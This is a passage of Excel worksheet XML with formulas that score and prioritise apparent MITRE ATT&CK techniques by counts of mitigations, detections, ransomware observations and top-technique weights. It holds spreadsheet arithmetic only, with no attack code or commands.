        <v>1274</v>
      </c>
      <c r="F309" s="51">
        <v>1</v>
      </c>
      <c r="G309" s="51">
        <v>1</v>
      </c>
      <c r="H309" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I309">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J309">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K309">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L309">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M309" s="25">
        <v>0</v>
      </c>
      <c r="N309" s="51">
        <v>2</v>
      </c>
      <c r="O309" s="51">
        <v>8</v>
      </c>
      <c r="P309" s="51">
        <v>0</v>
      </c>
      <c r="Q309" s="51">
        <v>0</v>
      </c>
      <c r="R309" s="52" t="s">
        <v>1275</v>
      </c>
      <c r="S309" s="51">
        <v>3</v>
      </c>
      <c r="T309" s="51" t="s">
        <v>1276</v>
      </c>
      <c r="U309" s="51">
        <v>6</v>
      </c>
      <c r="V309" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W309">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X309">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y309">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z309">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>10</v>
      </c>
      <c r="AA309">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.1</v>
      </c>
      <c r="AB309">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.1</v>
      </c>
      <c r="AC309" s="29" t="s">
        <v>117</v>
      </c>
      <c r="AD309" s="25" t="str" cm="1">
        <f t="array" ref="AD309">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC309)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE309" s="25">
        <f>IF(AD309="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF309" s="25" t="str" cm="1">
        <f t="array" ref="AF309">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC309)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG309" s="25">
        <f>IF(AF309="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH309" s="25" t="str" cm="1">
        <f t="array" ref="AH309">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC309)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI309" s="25">
        <f>IF(AH309="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ309" s="25" t="str" cm="1">
        <f t="array" ref="AJ309">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC309)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK309" s="25">
        <f>IF(AJ309="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL309" s="25" t="str" cm="1">
        <f t="array" ref="AL309">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC309)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM309" s="25">
        <f>IF(AL309="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN309" s="58">
        <v>5</v>
      </c>
      <c r="AO309" s="51">
        <v>1</v>
      </c>
      <c r="AP309" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.19462000000000002</v>
      </c>
      <c r="AQ309" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.3177777777777762E-2</v>
      </c>
      <c r="AR309" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.3177777777777762E-2</v>
      </c>
      <c r="AS309" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT309" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU30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10" spans="1:47" ht="32.1">
      <c r="A310" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.4366666666666669E-2</v>
      </c>
      <c r="B310" s="25">
        <f>SUM(H310,M310,V310)*(1+SUM(AE310,AG310,AI310,AK310,AM310))</f>
        <v>0.31033333333333335</v>
      </c>
      <c r="C310" s="25" t="s">
        <v>1277</v>
      </c>
      <c r="D310" s="25" t="s">
        <v>365</v>
      </c>
      <c r="E310" s="25" t="s">
        <v>1278</v>
      </c>
      <c r="F310" s="51">
        <v>1</v>
      </c>
      <c r="G310" s="51">
        <v>1</v>
      </c>
      <c r="H310" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I310">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J310">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K310">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L310">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M310" s="25">
        <v>0</v>
      </c>
      <c r="N310" s="51">
        <v>0</v>
      </c>
      <c r="O310" s="51">
        <v>0</v>
      </c>
      <c r="P310" s="51">
        <v>0</v>
      </c>
      <c r="Q310" s="51">
        <v>0</v>
      </c>
      <c r="R310" s="52" t="s">
        <v>366</v>
      </c>
      <c r="S310" s="51">
        <v>7</v>
      </c>
      <c r="T310" s="51" t="s">
        <v>1279</v>
      </c>
      <c r="U310" s="51">
        <v>7</v>
      </c>
      <c r="V310" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W310">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X310">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y310">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z310">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA310">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB310">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC310" s="29" t="s">
        <v>368</v>
      </c>
      <c r="AD310" s="25" t="str" cm="1">
        <f t="array" ref="AD310">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC310)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE310" s="25">
        <f>IF(AD310="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF310" s="25" t="str" cm="1">
        <f t="array" ref="AF310">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC310)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG310" s="25">
        <f>IF(AF310="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH310" s="25" t="str" cm="1">
        <f t="array" ref="AH310">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC310)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI310" s="25">
        <f>IF(AH310="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ310" s="25" t="str" cm="1">
        <f t="array" ref="AJ310">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC310)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK310" s="25">
        <f>IF(AJ310="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL310" s="25" t="str" cm="1">
        <f t="array" ref="AL310">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC310)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM310" s="25">
        <f>IF(AL310="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN310" s="58">
        <v>1</v>
      </c>
      <c r="AO310" s="51">
        <v>1</v>
      </c>
      <c r="AP310" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.4366666666666669E-2</v>
      </c>
      <c r="AQ310" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AR310" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AS310" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT310" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU31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11" spans="1:47" ht="63.95">
      <c r="A311" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.4366666666666669E-2</v>
      </c>
      <c r="B311" s="25">
        <f>SUM(H311,M311,V311)*(1+SUM(AE311,AG311,AI311,AK311,AM311))</f>
        <v>0.31033333333333335</v>
      </c>
      <c r="C311" s="25" t="s">
        <v>1280</v>
      </c>
      <c r="D311" s="25" t="s">
        <v>414</v>
      </c>
      <c r="E311" s="25" t="s">
        <v>1281</v>
      </c>
      <c r="F311" s="51">
        <v>1</v>
      </c>
      <c r="G311" s="51">
        <v>1</v>
      </c>
      <c r="H311" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I311">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J311">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K311">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L311">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M311" s="25">
        <v>0</v>
      </c>
      <c r="N311" s="51">
        <v>0</v>
      </c>
      <c r="O311" s="51">
        <v>0</v>
      </c>
      <c r="P311" s="51">
        <v>0</v>
      </c>
      <c r="Q311" s="51">
        <v>0</v>
      </c>
      <c r="R311" s="52" t="s">
        <v>161</v>
      </c>
      <c r="S311" s="51">
        <v>7</v>
      </c>
      <c r="T311" s="51" t="s">
        <v>415</v>
      </c>
      <c r="U311" s="51">
        <v>7</v>
      </c>
      <c r="V311" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W311">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X311">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y311">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z311">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA311">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB311">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC311" s="29" t="s">
        <v>901</v>
      </c>
      <c r="AD311" s="25" t="str" cm="1">
        <f t="array" ref="AD311">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC311)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE311" s="25">
        <f>IF(AD311="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF311" s="25" t="str" cm="1">
        <f t="array" ref="AF311">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC311)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG311" s="25">
        <f>IF(AF311="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH311" s="25" t="str" cm="1">
        <f t="array" ref="AH311">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC311)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI311" s="25">
        <f>IF(AH311="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ311" s="25" t="str" cm="1">
        <f t="array" ref="AJ311">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC311)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK311" s="25">
        <f>IF(AJ311="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL311" s="25" t="str" cm="1">
        <f t="array" ref="AL311">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC311)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM311" s="25">
        <f>IF(AL311="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN311" s="60">
        <v>1</v>
      </c>
      <c r="AO311" s="51">
        <v>1</v>
      </c>
      <c r="AP311" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.4366666666666669E-2</v>
      </c>
      <c r="AQ311" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AR311" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10344444444444445</v>
      </c>
      <c r="AS311" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT311" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU31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12" spans="1:47">
      <c r="A312" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.6666666666666671E-2</v>
      </c>
      <c r="B312" s="25">
        <f>SUM(H312,M312,V312)*(1+SUM(AE312,AG312,AI312,AK312,AM312))</f>
        <v>0.23333333333333334</v>
      </c>
      <c r="C312" s="25" t="s">
        <v>1282</v>
      </c>
      <c r="D312" s="25" t="s">
        <v>391</v>
      </c>
      <c r="E312" s="25" t="s">
        <v>1283</v>
      </c>
      <c r="F312" s="51">
        <v>1</v>
      </c>
      <c r="G312" s="51">
        <v>1</v>
      </c>
      <c r="H312" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I312">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J312">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K312">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L312">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M312" s="25">
        <v>0</v>
      </c>
      <c r="N312" s="51">
        <v>0</v>
      </c>
      <c r="O312" s="51">
        <v>0</v>
      </c>
      <c r="P312" s="51">
        <v>0</v>
      </c>
      <c r="Q312" s="51">
        <v>0</v>
      </c>
      <c r="R312" s="52" t="s">
        <v>1263</v>
      </c>
      <c r="S312" s="51">
        <v>7</v>
      </c>
      <c r="T312" s="51" t="s">
        <v>1264</v>
      </c>
      <c r="U312" s="51">
        <v>7</v>
      </c>
      <c r="V312" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W312">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X312">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y312">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z312">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA312">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB312">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC312" s="29"/>
      <c r="AD312" s="25" t="str" cm="1">
        <f t="array" ref="AD312">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC312)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE312" s="25">
        <f>IF(AD312="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF312" s="25" t="str" cm="1">
        <f t="array" ref="AF312">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC312)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG312" s="25">
        <f>IF(AF312="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH312" s="25" t="str" cm="1">
        <f t="array" ref="AH312">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC312)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI312" s="25">
        <f>IF(AH312="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ312" s="25" t="str" cm="1">
        <f t="array" ref="AJ312">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC312)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK312" s="25">
        <f>IF(AJ312="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL312" s="25" t="str" cm="1">
        <f t="array" ref="AL312">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC312)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM312" s="25">
        <f>IF(AL312="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN312" s="60">
        <v>1</v>
      </c>
      <c r="AO312" s="51">
        <v>1</v>
      </c>
      <c r="AP312" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.6666666666666671E-2</v>
      </c>
      <c r="AQ312" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.7777777777777779E-2</v>
      </c>
      <c r="AR312" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.7777777777777779E-2</v>
      </c>
      <c r="AS312" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT312" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU31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13" spans="1:47" ht="32.1">
      <c r="A313" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1033333333333333E-2</v>
      </c>
      <c r="B313" s="25">
        <f>SUM(H313,M313,V313)*(1+SUM(AE313,AG313,AI313,AK313,AM313))</f>
        <v>0.31033333333333335</v>
      </c>
      <c r="C313" s="25" t="s">
        <v>1284</v>
      </c>
      <c r="D313" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E313" s="25" t="s">
        <v>1285</v>
      </c>
      <c r="F313" s="51">
        <v>1</v>
      </c>
      <c r="G313" s="51">
        <v>1</v>
      </c>
      <c r="H313" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I313">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J313">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K313">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L313">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M313" s="25">
        <v>0</v>
      </c>
      <c r="N313" s="51">
        <v>2</v>
      </c>
      <c r="O313" s="51">
        <v>1</v>
      </c>
      <c r="P313" s="51">
        <v>1</v>
      </c>
      <c r="Q313" s="51">
        <v>0</v>
      </c>
      <c r="R313" s="52" t="s">
        <v>1286</v>
      </c>
      <c r="S313" s="51">
        <v>7</v>
      </c>
      <c r="T313" s="52" t="s">
        <v>1287</v>
      </c>
      <c r="U313" s="51">
        <v>5</v>
      </c>
      <c r="V313" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W313">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X313">
